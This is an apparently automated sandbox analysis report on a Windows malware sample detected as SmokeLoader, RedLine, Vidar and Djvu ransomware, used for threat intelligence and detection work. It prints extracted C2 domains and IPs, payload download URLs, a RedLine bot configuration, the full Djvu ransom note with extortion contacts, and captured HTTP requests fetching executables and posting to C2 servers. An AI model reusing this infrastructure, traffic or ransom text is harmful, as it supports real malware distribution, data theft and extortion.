Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 736968
MD5: 4bb5c0ed18f4b7ae33ba272eae17abf2
SHA1: e0e02b31d3ad2e965d223ebe3451bd9c9e0385fa
SHA256: 418d9b6e1fc560a80fd9f37e34bee51e79a371cfcc24eede84928b506cd918b6
Tags: exe

Detection

CryptOne, Djvu, RedLine, SmokeLoader, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected CryptOne packer
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Registers a DLL
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

AV Detection

Source: http://95.217.246.41:80/815243149147.zipz Avira URL Cloud: Label: malware
Source: http://95.217.246.41:80/815243149147.zip Avira URL Cloud: Label: malware
Source: http://95.217.246.41/1752 Avira URL Cloud: Label: malware
Source: http://95.217.246.41/ Avira URL Cloud: Label: malware
Source: 78.153.144.3:2510 Avira URL Cloud: Label: malware
Source: http://185.174.137.70/s.exe Avira URL Cloud: Label: malware
Source: http://95.217.246.41:80 Avira URL Cloud: Label: malware
Source: http://starvestitibo.org/Mozilla/5.0 URL Reputation: Label: malware
Source: http://95.217.246.41/815243149147.zip Avira URL Cloud: Label: malware
Source: http://95.217.246.41/m Avira URL Cloud: Label: malware
Source: http://95.217.27.155:80 Avira URL Cloud: Label: malware
Source: file.exe Virustotal: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\37F1.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\405E.exe ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\49F6.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\509E.dll ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\5487.exe ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Roaming\gecbfdt ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Roaming\uucbfdt ReversingLabs: Detection: 39%
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\405E.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5999.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gecbfdt Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\45DE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\509E.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\49F6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5487.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\uucbfdt Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Joe Sandbox ML: detected
Source: 18.2.5487.exe.890e67.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 18.3.5487.exe.8f0000.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 30.0.gecbfdt.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.49F6.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.regsvr32.exe.4ff0184.1.unpack Avira: Label: TR/Kazy.4159236
Source: 15.0.49F6.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.49F6.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.49F6.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000000.00000002.356712809.0000000000710000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://hulimudulinu.net/", "http://stalnnuytyt.org/", "http://gulutina49org.org/", "http://furubujjul.net/", "http://starvestitibo.org/", "http://liubertiyyyul.net/", "http://bururutu44org.org/", "http://youyouumenia5.org/", "http://nvulukuluir.net/", "http://nuluitnulo.me/", "http://guluiiiimnstra.net/"]}
Source: 0000000C.00000002.549799190.0000000005F55000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "78.153.144.3:2510", "Bot Id": "slovarik1btc", "Authorization Header": "69236173f96390de00bb5a5120a1f3a0"}
Source: 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://fresherlights.com/files/1/build3.exe"], "C2 url": "http://fresherlights.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-dyi5UcwIT9\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0597Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", 
"C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\

Compliance

Source: C:\Users\user\AppData\Local\Temp\37F1.exe Unpacked PE file: 12.2.37F1.exe.400000.0.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 185.220.204.64:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\weba\kika.pdb source: 405E.exe, 0000000D.00000000.394848625.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, gecbfdt, 0000001E.00000000.484717133.0000000000401000.00000020.00000001.01000000.00000014.sdmp, 405E.exe.1.dr, gecbfdt.1.dr
Source: Binary string: C:\nefih\xugo.pdb source: 5999.exe, 00000013.00000000.409927020.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000013.00000002.470817394.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000019.00000000.431212305.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe.1.dr
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 5999.exe, 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\hegehi\20\gilecozosixebu gazirule82-kekec.pdb source: file.exe, uucbfdt.1.dr
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: QDC:\gabotolupajavi\yakorod\pucomenazis.pdb source: 49F6.exe, 0000000F.00000000.399892526.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 49F6.exe.1.dr
Source: Binary string: nHC:\Windows\System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.530857284.0000000000196000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\gix\modabohuva lopehojeha9-kotisotinago\kayuhoki.pdb source: 45DE.exe, 0000000E.00000000.397590247.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 45DE.exe.1.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbR source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: _.pdb source: 37F1.exe, 0000000C.00000002.549799190.0000000005F55000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.545785192.0000000004B70000.00000004.08000000.00040000.00000000.sdmp, 37F1.exe, 0000000C.00000002.544624082.0000000004A4A000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000003.430586809.0000000002EF0000.00000004.00000020.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000003.426623227.0000000002EB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\gix\modabohuva lopehojeha9-kotisotinago\kayuhoki.pdbx source: 45DE.exe, 0000000E.00000000.397590247.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 45DE.exe.1.dr
Source: Binary string: 1C:\lahikuvobive\puhob.pdbp source: 5487.exe, 00000012.00000000.405253268.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 5487.exe.1.dr
Source: Binary string: C:\gihiyunawajova-92\licirif_zezada\88 lefe.pdb source: 37F1.exe, 0000000C.00000000.391310999.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 37F1.exe.1.dr
Source: Binary string: System.ServiceModel.pdbH source: 37F1.exe, 0000000C.00000002.542633343.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: FC:\weba\kika.pdb source: 405E.exe, 0000000D.00000000.394848625.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, gecbfdt, 0000001E.00000000.484717133.0000000000401000.00000020.00000001.01000000.00000014.sdmp, 405E.exe.1.dr, gecbfdt.1.dr
Source: Binary string: System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.542633343.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\lahikuvobive\puhob.pdb source: 5487.exe, 00000012.00000000.405253268.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 5487.exe.1.dr
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 5999.exe, 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\gabotolupajavi\yakorod\pucomenazis.pdb source: 49F6.exe, 0000000F.00000000.399892526.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 49F6.exe.1.dr
Source: Binary string: System.ServiceModel.pdbK source: 37F1.exe, 0000000C.00000002.552906667.0000000008132000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ^5C:\nefih\xugo.pdb source: 5999.exe, 00000013.00000000.409927020.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000013.00000002.470817394.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000019.00000000.431212305.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe.1.dr
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

Networking

Source: C:\Windows\explorer.exe Domain query: o36fafs3sn6xou.com
Source: C:\Windows\explorer.exe Domain query: furubujjul.net
Source: C:\Windows\explorer.exe Domain query: o3zxuhcc4hl9mi.com
Source: C:\Windows\explorer.exe Domain query: o3l3roozuidudu.com
Source: C:\Windows\explorer.exe Network Connect: 185.174.137.70 80
Source: C:\Windows\explorer.exe Domain query: shingroup.com
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 193.106.191.15 80
Source: C:\Windows\SysWOW64\explorer.exe Domain query: starvestitibo.org
Source: Traffic Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.6:49705 -> 185.174.137.70:80
Source: Malware configuration extractor URLs: http://fresherlights.com/lancer/get.php
Source: Malware configuration extractor URLs: 78.153.144.3:2510
Source: Malware configuration extractor URLs: http://hulimudulinu.net/
Source: Malware configuration extractor URLs: http://stalnnuytyt.org/
Source: Malware configuration extractor URLs: http://gulutina49org.org/
Source: Malware configuration extractor URLs: http://furubujjul.net/
Source: Malware configuration extractor URLs: http://starvestitibo.org/
Source: Malware configuration extractor URLs: http://liubertiyyyul.net/
Source: Malware configuration extractor URLs: http://bururutu44org.org/
Source: Malware configuration extractor URLs: http://youyouumenia5.org/
Source: Malware configuration extractor URLs: http://nvulukuluir.net/
Source: Malware configuration extractor URLs: http://nuluitnulo.me/
Source: Malware configuration extractor URLs: http://guluiiiimnstra.net/
Source: global traffic HTTP traffic detected: GET /truemansho HTTP/1.1Host: t.me
Source: global traffic HTTP traffic detected: GET /1752 HTTP/1.1Host: 95.217.246.41
Source: global traffic HTTP traffic detected: GET /815243149147.zip HTTP/1.1Host: 95.217.246.41Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----6180824849005615Host: 95.217.246.41Content-Length: 141137Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 03 Nov 2022 11:46:51 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 03 Nov 2022 11:37:55 GMTETag: "34e00-5ec8f63652d4d"Accept-Ranges: bytesContent-Length: 216576Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1b ac 4c 86 5f cd 22 d5 5f cd 22 d5 5f cd 22 d5 41 9f b7 d5 42 cd 22 d5 41 9f a1 d5 dc cd 22 d5 78 0b 59 d5 58 cd 22 d5 5f cd 23 d5 ce cd 22 d5 41 9f a6 d5 6d cd 22 d5 41 9f b6 d5 5e cd 22 d5 41 9f b3 d5 5e cd 22 d5 52 69 63 68 5f cd 22 d5 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 da 69 b0 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e6 01 00 00 24 17 00 00 00 00 00 16 95 00 00 00 10 00 00 00 00 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 19 00 00 04 00 00 2a 6d 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 e8 01 00 50 00 00 00 00 c0 18 00 10 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 43 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 e4 01 00 00 10 00 00 00 e6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 b1 16 00 00 00 02 00 00 20 01 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 
10 43 00 00 00 c0 18 00 00 44 00 00 00 0a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /upload/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shingroup.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ihscr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://erlnjwq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://petsisa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://afsgomos.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wovjsp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ugojjub.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ojgirn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: starvestitibo.org
Source: global traffic HTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.174.137.70
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kgypm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tigsodvg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tdwofe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnwpmx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lcnrqc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nduckkr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qtvcgbfk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gafgylgoi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nmqtq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejmdi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xnnhfx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xoeixqhnce.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: starvestitibo.org
